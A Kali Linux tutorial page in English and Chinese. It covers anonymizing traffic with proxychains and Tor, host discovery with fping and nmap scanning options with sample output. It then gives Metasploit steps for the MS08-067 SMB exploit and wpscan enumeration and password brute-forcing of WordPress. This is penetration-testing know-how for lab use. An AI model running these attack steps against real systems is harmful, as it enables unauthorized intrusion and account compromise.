Kali Linux is a Debian-based Linux distribution aimed at advanced Penetration Testing and Security Auditing. Kali contains several hundred tools which are geared towards various information security tasks, such as Penetration Testing, Security research, Computer Forensics and Reverse Engineering.
Download Kali: https://www.kali.org/downloads/
Basic Configuration Videos:
1. Use Proxychains and Tor to Visit Internet
1.1 Configure Proxychains
root@Kali:~# vi /etc/proxychains.conf
You can choose between dynamic_chain, stric_chain or random_chaim. Dynamic_chain will be preferred.
# proxychains.conf VER 3.1
#
# HTTP, SOCKS4, SOCKS5 tunneling proxifier with DNS.
#
# The option below identifies how the ProxyList is treated.
# only one option should be uncommented at time,
# otherwise the last appearing option will be accepted
#
dynamic_chain
#
# Dynamic - Each connection will be done via chained proxies
# all proxies chained in the order as they appear in the list
# at least one proxy must be online to play in chain
# (dead proxies are skipped)
# otherwise EINTR is returned to the app
#
#strict_chain
#
# Strict - Each connection will be done via chained proxies
# all proxies chained in the order as they appear in the list
# all proxies must be online to play in chain
# otherwise EINTR is returned to the app
#
#random_chain
#
# Random - Each connection will be done via random proxy
# (or proxy chain, see chain_len) from the list.
# this option is good to test your IDS :)
You also can append some of your known proxy server list at the end of proxychains.conf file.
# ProxyList format
# type host port [user pass]
# (values separated by 'tab' or 'blank')
#
#
# Examples:
#
# socks5 192.168.67.78 1080 lamer secret
# http 192.168.89.3 8080 justu hidden
# socks4 192.168.1.49 1080
# http 192.168.39.93 8080
#
#
# proxy types: http, socks4, socks5
# ( auth types supported: "basic"-http "user/pass"-socks )
#
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks4 127.0.0.1 9050
socks5 98.26.2.3 1893
socks5 76.22.86.10 1658
1.2 Install Tor
You will need to add a correct version source into /etc/apt/sorces.list file. Else your installation will fail.
echo "deb http://http.kali.org/kali kali-rolling main contrib non-free" > /etc/apt/sources.list && apt-get update && apt-get install tor -y && apt autoremove -y
1.3 Use Proxychains to access Internet
You can run a nmap scan using Proxychains which will force the scan to run through one of the proxies in your list by typing in the following command into terminal:
proxychains nmap scanme.nmap.org
You can also test Proxychains with Firefox:
proxychains firefox www.duckduckgo.com
proxychains curl icanhazip.com
YouTube Video:
Using proxychains to start msfconsole:
root@kali:~# proxychains msfconsole
ProxyChains-3.1 (http://proxychains.sf.net)
|DNS-request| 0.0.0.0
|S-chain|-<>-127.0.0.1:9050-<--timeout
|DNS-response|: 0.0.0.0 is not exist
, ,
/ \
((__---,,,---__))
(_) O O (_)_________
\ _ / |\
o_o \ M S F | \
\ _____ | *
||| WW |||
||| |||
Tired of typing 'set RHOSTS'? Click & pwn with Metasploit Pro
-- type 'go_pro' to launch it now.
=[ metasploit v4.7.0-2013082802 [core:4.7 api:1.0]
+ -- --=[ 1161 exploits - 641 auxiliary - 180 post
+ -- --=[ 310 payloads - 30 encoders - 8 nops
msf >
2. Discover alive machines in target network
root@kali:~# fping -g -r 0 -s 192.168.2.0/24 | grep alive 192.168.2.1 is alive 192.168.2.2 is alive 192.168.2.4 is alive 192.168.2.31 is alive 192.168.2.50 is alive 192.168.2.200 is alive 254 targets 6 alive 248 unreachable 0 unknown addresses 248 timeouts (waiting for response) 254 ICMP Echos sent 6 ICMP Echo Replies received 0 other ICMP received 4.49 ms (min round trip time) 4.92 ms (avg round trip time) 5.14 ms (max round trip time) 3.288 sec (elapsed real time)
3. Use Nmap to scan targets
3.1 扫描单个目标地址
nmap 192.168.0.100
3.2 扫描多个目标地址
nmap 192.168.0.100 192.168.0.105
3.3 扫描一个范围内的目标地址
nmap 192.168.0.100-110
3.4 扫描目标地址所在的某个网段
nmap 192.168.0.0/24
3.5 扫描主机列表targets.txt中的所有目标地址
nmap -iL d:\targets.txt
3.6 扫描除某一个目标地址之外的所有目标地址
nmap 192.168.0.0/24 -exclude 192.168.109.105
3.7 扫描除某一文件中的目标地址之外的目标地址
nmap 192.168.0.0/24 -excludefile d:\targets.txt
3.8 扫描某一目标地址的21、22、23、80端口
nmap 192.168.0.100 -p 21,22,23,80
3.9 对目标地址进行路由跟踪
nmap –traceroute 192.168.0.105
3.10 扫描目标地址所在C段的在线情况
nmap -sP 192.168.0.0/24
3.11 目标地址的操作系统指纹识别
nmap -O 192.168.0.105
3.12 目标地址提供的服务版本检测
nmap -sV 192.168.0.105
3.13 探测防火墙状态
在实战中,可以利用FIN扫描的方式探测防火墙的状态。FIN扫描用于识别端口是否关闭,收到RST回复说明该端口关闭,否则就是open或filtered状态。
nmap -sF -T4 192.168.0.105
3.14 鉴权扫描: 使用–script=auth可以对目标主机或目标主机所在的网段进行应用弱口令检测
nmap –script=auth 192.168.0.105
3.15 暴力破解攻击: nmap具有暴力破解的功能,可对数据库、SMB、SNMP等进行简单密码的暴力猜解
nmap –script=brute 192.168.0.105
3.16 扫描常见的漏洞: nmap具有漏洞扫描的功能,可以检查目标主机或网段是否存在常见的漏洞
nmap –script=vuln 192.168.0.105
3.17 应用服务扫描: nmap具备很多常见应用服务的扫描脚本,例如VNC服务、MySQL服务、Telnet服务、Rsync服务等,以VNC服务为例
nmap –script=realvnc-auth-bypass 192.168.0.105
3.18 探测局域网内更多服务开启的情况:
nmap -n -p 445 –script=broadcast 192.168.0.105
3.19 whois解析: 利用第三方的数据库或资源查询目标地址的信息,例如进行whois解析
nmap -script external baidu.com
root@kali:~# nmap -T4 -O 192.168.2.31 192.168.2.200
Starting Nmap 7.60 ( https://nmap.org ) at 2019-01-19 21:35 EST
Nmap scan report for 192.168.2.31
Host is up (0.31s latency).
Not shown: 990 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
514/tcp filtered shell
3389/tcp open ms-wbt-server
5357/tcp open wsdapi
7070/tcp open realserver
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
Device type: general purpose
Running: Microsoft Windows XP|7|2012
OS CPE: cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_server_2012
OS details: Microsoft Windows XP SP3, Microsoft Windows XP SP3 or Windows 7 or Windows Server 2012
Nmap scan report for 192.168.2.200
Host is up (0.12s latency).
Not shown: 995 closed ports
PORT STATE SERVICE
80/tcp open http
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
514/tcp filtered shell
Aggressive OS guesses: Actiontec MI424WR-GEN3I WAP (99%), DD-WRT v24-sp2 (Linux 2.4.37) (98%), Linux 3.2 (97%), Linux 4.4 (97%), Microsoft Windows XP SP3 or Windows 7 or Windows Server 2012 (96%), Microsoft Windows XP SP3 (96%), BlueArc Titan 2100 NAS device (91%)
No exact OS matches for host (test conditions non-ideal).
OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 2 IP addresses (2 hosts up) scanned in 136.89 seconds
root@kali:~#
4. MSF – Metaspoit
4.1 Basic Usage and Steps
- search smb
- use exploit/windows/smb/ms08_067_netapi
- show options
- set RHOST 192.168.230.145
- set target 41
- exploit
4.2 YouTube – Kali Metasploit Exploit FTP Service on VSFTPD:
4.3 YouTube – Kali Metasploit Exploit Samba Service:
4.4. wpscan to attack WordPress
Use wpscan to start a simple attack WordPress site
root@localhost:~# wpscan -u 10.94.200.81
list wordpress user
root@localhost:~# wpscan -u 10.94.200.81 -e u vp
Use wordlist to brute force WordPress account
root@localhost:~# wpscan -u 10.94.200.81 -e u –wordlist /usr/share/wordlists/metasploit/common-roots.txt
4.5. Exploit Windows 7 or Windows 2008 Servers
YouTube video: Using EternalBlue Vulnerability to Exploit Windows 2008 Server
References:
1. tor instaling